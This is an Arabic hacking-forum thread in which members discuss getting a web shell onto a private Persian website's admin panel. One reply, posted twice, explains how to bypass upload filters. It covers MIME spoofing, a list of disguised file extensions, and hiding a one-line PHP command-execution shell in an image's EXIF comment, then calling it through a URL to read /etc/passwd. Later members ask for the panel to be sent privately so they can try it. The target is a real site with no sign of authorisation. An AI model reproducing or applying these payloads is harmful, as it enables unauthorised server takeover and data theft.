التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 07-09-2014, 07:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية kmfh83
 

 

 
إحصائية العضو






kmfh83 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kmfh83 is on a distinguished road

. مجاب: اريد طريقة رفع شل جديدة


كما هو واضح بالعنوان لوحة تحكم لسكربت برمجه خاصة لموقع فارسي

وجدت مكانين لرفع الملفات الموقع الاول يقبل ملفات بي اتش بي ولكن عند الرفع يغير الاسم ولا يغير الامتداد يبقى امتداد الملف كما هو بي اتش بي لكن لا يعمل يأتي خطأ
Internal Server Error

المشكله تم رفع شلات كثيرة بعضها مشفر والاخر غير مشفر لدرجة تم رفع شل بيرل ايضا نفس الحكاية حاولت ارفع هتاكسس ولكن مثل ماخبرتكم يغير الاسم الى 13124134434 عشوائي
حاولت ارفع ملف بي اتش بي بداخله كود يعمل هتاكسس جديد ولكن نفس الحكاية

----------------------------------------------

الموقع الاخر رفع صور تمت تجربت اداة tamper Data فيها واداة live http header ايضا دون جدوى مايرضى يرفع الا ملف صور فقط

الحل ؟؟؟




Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC hvd] 'vdrm vtu ag []d]m

   

أفضل جواب - كتبه hisokaosomaki
عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة
الحماية حسب نوع الملف
كود PHP:
if($_FILES['userfile']['type'] != "image/jpg"
لتخطي هده الحماية نستعمل تامبر داتا


الحماية باستخدام اللائحة البيضاء
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة
كود PHP:
$valid_file_extensions = array(".jpg"".jpeg"".gif"".png"); 
لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف
مثلا
اقتباس
shell.jpg.php
shell.jpg.PhP
shell.php.xxxjpg
shell.php;.jpg
shell.php%0delete0.jpg
shell.php.test
.phtml
.php3/.php4/.php5

الحماية باستخدام الدوال الخاصة بالصور
في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة
كود PHP:
$imageinfo getimagesize($_FILES['userfile']['tmp_name']); 
في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot
انا سوف اشرح exif pilot
http://exifpilot.com/ الموقع الرسمي للبرنامج
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل الشل المجهري في التعليق
كود PHP:
<?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>
كما هو موضح في الصورة


الكود معناه ادا وجد متغير او بارميتر اسمه لول نفد مايحتويه المتغير
ثم نرسل امر فتح الملف etc/passwd
اقتباس
www.somesite.com/shellPath/shelleName.php?lol=cat/etc/passwd

و الاستغلال يكون بهده الطريقة



لا ادري لمادا لم ارى اي عربي يقوم بهده الطريقة هل يريدونها برايفت ؟؟ لاادري
على كل حال اتمنى ان اكون قد افدتك اخي
قديم 07-12-2014, 03:26 AM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية ghost libya
 

 

 
إحصائية العضو







ghost libya غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
ghost libya is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


اسم السكربت يا اخ حتى نحاولو نجرب معاه

التوقيع

http://im53.gulfup.com/WdRGjF.gif

 

   

قديم 07-12-2014, 10:56 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية kmfh83
 

 

 
إحصائية العضو






kmfh83 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kmfh83 is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


برمجه خاصة أخي :(

أشكرك لإهتمامك

   

قديم 07-29-2014, 03:49 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو






hisokaosomaki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hisokaosomaki is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


هناك طريقة اعرفها لم ارها في اي منتدى عربي ابدا
وهي حقن شل مجهري يتكون من سطر واحد في الميتا داتا الخاص بصورة
ثم اعطاءه الاوامر في شكل بارمترات في الرابط
البرنامج المستعمل exif pilote
ساضع شرح ادا تطلب الامر

   

قديم 07-31-2014, 07:24 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
الصورة الرمزية kmfh83
 

 

 
إحصائية العضو






kmfh83 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kmfh83 is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


لوكان هنالك شرح أكون لك من الشاكرين

   

قديم 08-01-2014, 11:39 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
 
إحصائية العضو






hisokaosomaki غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
hisokaosomaki is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


عند رفع الشل عادة المواقع تكون لديها تدابير امنية تمنع دالك
و كل إجراء أمني لديه طريقة تخطي المناسبة لدالك سوف اشرح طريقة الرفع حسب الحماية المستعملة
الحماية حسب نوع الملف

كود PHP:
if($_FILES['userfile']['type'] != "image/jpg"
لتخطي هده الحماية نستعمل تامبر داتا


الحماية باستخدام اللائحة البيضاء
وهو جدول في ملف البي اش بي يحتوي على الامتدادات المسموحة
كود PHP:
$valid_file_extensions = array(".jpg"".jpeg"".gif"".png"); 
لتخطي هادا النوع من الحمايات نتلاعب ياسم الملف
مثلا
اقتباس
shell.jpg.php
shell.jpg.PhP
shell.php.xxxjpg
shell.php;.jpg
shell.php%0delete0.jpg
shell.php.test
.phtml
.php3/.php4/.php5

الحماية باستخدام الدوال الخاصة بالصور
في هده الحالة المبرمج يستعمل دالة خاصة بالصور مثلا الدالة التي ترجع قياسات الصورة للتاكد ان الملف الدي تم رفعه هو فعلا صورة
كود PHP:
$imageinfo getimagesize($_FILES['userfile']['tmp_name']); 
في هده الحالة كل الطرق السابقة سوف تفشل و الحل الوحيد هو رفع صورة حقيقيقة
لذالك نذهب الى برنامج الرسام و ننشئ صورة صغيرة بحجم الايقونة ونحفظها في سطح المكتب
نحمل برنامج لتعديل الميتا داتا الخاص بالصورة مثل GIMPاو exif pilot
انا سوف اشرح exif pilot
http://exifpilot.com/ الموقع الرسمي للبرنامج
بعد التثبيث نفتح الصورة بالبرامج نضع الكود الدي يمثل الشل المجهري في التعليق
كود PHP:
<?if($_GET['lol']){echo"<pre>".shell_exec($_GET["lol"]);}?>
كما هو موضح في الصورة


الكود معناه ادا وجد متغير او بارميتر اسمه لول نفد مايحتويه المتغير
ثم نرسل امر فتح الملف etc/passwd
اقتباس
www.somesite.com/shellPath/shelleName.php?lol=cat/etc/passwd

و الاستغلال يكون بهده الطريقة



لا ادري لمادا لم ارى اي عربي يقوم بهده الطريقة هل يريدونها برايفت ؟؟ لاادري
على كل حال اتمنى ان اكون قد افدتك اخي

   

قديم 08-04-2014, 04:09 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية kmfh83
 

 

 
إحصائية العضو






kmfh83 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
kmfh83 is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


شكراُ لك أخي ولكن تم التجربة من غير جدوى

من يرد لوحة التحكم لكي يحاول فلا مانع لدي

   

قديم 10-03-2014, 06:31 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو







serial killer غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 16
serial killer is on a distinguished road

افتراضي رد: اريد طريقة رفع شل جديدة


ارسل اللوحة على الخاص

   

موضوع مغلق

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 09:06 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0